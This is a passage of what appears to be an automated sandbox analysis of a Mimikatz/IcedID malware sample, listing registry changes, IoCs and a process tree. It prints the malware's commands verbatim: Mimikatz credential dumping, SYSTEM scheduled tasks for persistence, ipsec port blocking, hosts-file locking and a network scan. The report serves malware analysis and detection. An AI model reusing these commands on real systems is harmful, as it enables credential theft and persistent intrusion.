\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbqlvcqnq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language emzriir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2548 cmd.exe 2144 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00090000000234b2-6.dat nsis_installer_2 behavioral2/files/0x000400000001693b-15.dat nsis_installer_1 behavioral2/files/0x000400000001693b-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" emzriir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ emzriir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ emzriir.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2144 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3708 schtasks.exe 2464 schtasks.exe 1824 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2104 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2104 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe Token: SeDebugPrivilege 4000 emzriir.exe Token: SeDebugPrivilege 1948 emzriir.exe Token: SeDebugPrivilege 4116 vfshost.exe Token: SeDebugPrivilege 436 zhcbccpzr.exe Token: SeLockMemoryPrivilege 4908 bnidgq.exe Token: SeLockMemoryPrivilege 4908 bnidgq.exe Token: SeDebugPrivilege 964 zhcbccpzr.exe Token: SeDebugPrivilege 1064 zhcbccpzr.exe Token: SeDebugPrivilege 4392 zhcbccpzr.exe Token: SeDebugPrivilege 4656 zhcbccpzr.exe Token: SeDebugPrivilege 3136 zhcbccpzr.exe Token: SeDebugPrivilege 3816 zhcbccpzr.exe Token: SeDebugPrivilege 4568 zhcbccpzr.exe Token: SeDebugPrivilege 3884 zhcbccpzr.exe Token: SeDebugPrivilege 4412 zhcbccpzr.exe Token: SeDebugPrivilege 3828 zhcbccpzr.exe Token: SeDebugPrivilege 112 zhcbccpzr.exe Token: SeDebugPrivilege 4504 zhcbccpzr.exe Token: SeDebugPrivilege 4140 zhcbccpzr.exe Token: SeDebugPrivilege 2216 zhcbccpzr.exe Token: SeDebugPrivilege 1632 zhcbccpzr.exe Token: SeDebugPrivilege 4104 zhcbccpzr.exe Token: SeDebugPrivilege 2212 zhcbccpzr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2104 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe 2104 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe 4000 emzriir.exe 4000 emzriir.exe 1948 emzriir.exe 1948 emzriir.exe 540 xohudmc.exe 1276 wooakm.exe 4828 emzriir.exe 4828 emzriir.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2104 wrote to memory of 2548 2104 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe 85 PID 2104 wrote to memory of 2548 2104 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe 85 PID 2104 wrote to memory of 2548 2104 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe 85 PID 2548 wrote to memory of 2144 2548 cmd.exe 87 PID 2548 wrote to memory of 2144 2548 cmd.exe 87 PID 2548 wrote to memory of 2144 2548 cmd.exe 87 PID 2548 wrote to memory of 4000 2548 cmd.exe 95 PID 2548 wrote to memory of 4000 2548 cmd.exe 95 PID 2548 wrote to memory of 4000 2548 cmd.exe 95 PID 1948 wrote to memory of 4164 1948 emzriir.exe 97 PID 1948 wrote to memory of 4164 1948 emzriir.exe 97 PID 1948 wrote to memory of 4164 1948 emzriir.exe 97 PID 4164 wrote to memory of 4160 4164 cmd.exe 99 PID 4164 wrote to memory of 4160 4164 cmd.exe 99 PID 4164 wrote to memory of 4160 4164 cmd.exe 99 PID 4164 wrote to memory of 1652 4164 cmd.exe 100 PID 4164 wrote to memory of 1652 4164 cmd.exe 100 PID 4164 wrote to memory of 1652 4164 cmd.exe 100 PID 4164 wrote to memory of 1396 4164 cmd.exe 101 PID 4164 wrote to memory of 1396 4164 cmd.exe 101 PID 4164 wrote to memory of 1396 4164 cmd.exe 101 PID 4164 wrote to memory of 1876 4164 cmd.exe 102 PID 4164 wrote to memory of 1876 4164 cmd.exe 102 PID 4164 wrote to memory of 1876 4164 cmd.exe 102 PID 4164 wrote to memory of 2056 4164 cmd.exe 103 PID 4164 wrote to memory of 2056 4164 cmd.exe 103 PID 4164 wrote to memory of 2056 4164 cmd.exe 103 PID 4164 wrote to memory of 2100 4164 cmd.exe 104 PID 4164 wrote to memory of 2100 4164 cmd.exe 104 PID 4164 wrote to memory of 2100 4164 cmd.exe 104 PID 1948 wrote to memory of 4028 1948 emzriir.exe 108 PID 1948 wrote to memory of 4028 1948 emzriir.exe 108 PID 1948 wrote to memory of 4028 1948 emzriir.exe 108 PID 1948 wrote to memory of 4540 1948 emzriir.exe 110 PID 1948 wrote to memory of 4540 1948 emzriir.exe 110 PID 1948 wrote to memory of 4540 1948 emzriir.exe 110 PID 1948 wrote to memory of 964 1948 emzriir.exe 112 PID 1948 wrote to memory of 964 1948 emzriir.exe 112 PID 1948 wrote to memory of 964 1948 emzriir.exe 112 PID 1948 wrote to memory of 4236 1948 emzriir.exe 117 PID 1948 wrote to memory of 4236 1948 emzriir.exe 117 PID 1948 wrote to memory of 4236 1948 emzriir.exe 117 PID 4236 wrote to memory of 3036 4236 cmd.exe 119 PID 4236 wrote to memory of 3036 4236 cmd.exe 119 PID 4236 wrote to memory of 3036 4236 cmd.exe 119 PID 3036 wrote to memory of 2856 3036 wpcap.exe 120 PID 3036 wrote to memory of 2856 3036 wpcap.exe 120 PID 3036 wrote to memory of 2856 3036 wpcap.exe 120 PID 2856 wrote to memory of 2548 2856 net.exe 122 PID 2856 wrote to memory of 2548 2856 net.exe 122 PID 2856 wrote to memory of 2548 2856 net.exe 122 PID 3036 wrote to memory of 2008 3036 wpcap.exe 123 PID 3036 wrote to memory of 2008 3036 wpcap.exe 123 PID 3036 wrote to memory of 2008 3036 wpcap.exe 123 PID 2008 wrote to memory of 116 2008 net.exe 125 PID 2008 wrote to memory of 116 2008 net.exe 125 PID 2008 wrote to memory of 116 2008 net.exe 125 PID 3036 wrote to memory of 4828 3036 wpcap.exe 126 PID 3036 wrote to memory of 4828 3036 wpcap.exe 126 PID 3036 wrote to memory of 4828 3036 wpcap.exe 126 PID 4828 wrote to memory of 4240 4828 net.exe 128 PID 4828 wrote to memory of 4240 4828 net.exe 128 PID 4828 wrote to memory of 4240 4828 net.exe 128 PID 3036 wrote to memory of 4068 3036 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1772
-
C:\Windows\TEMP\qzebsiybv\bnidgq.exe"C:\Windows\TEMP\qzebsiybv\bnidgq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Users\Admin\AppData\Local\Temp\2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\znrgncrv\emzriir.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2144
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4000
-
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4160
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1396
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2100
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4028
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4540
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:964
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exeC:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2548
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:116
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4240
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4068 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4532
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4676 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4364 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2552
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3680
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3040 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:220
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3368 -
C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exeC:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kgkufnrnc\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3908 -
C:\Windows\kgkufnrnc\Corporate\vfshost.exeC:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:400 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"2⤵PID:3824
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3708
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5084
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4668
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1124
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2552
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4484
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2456
-
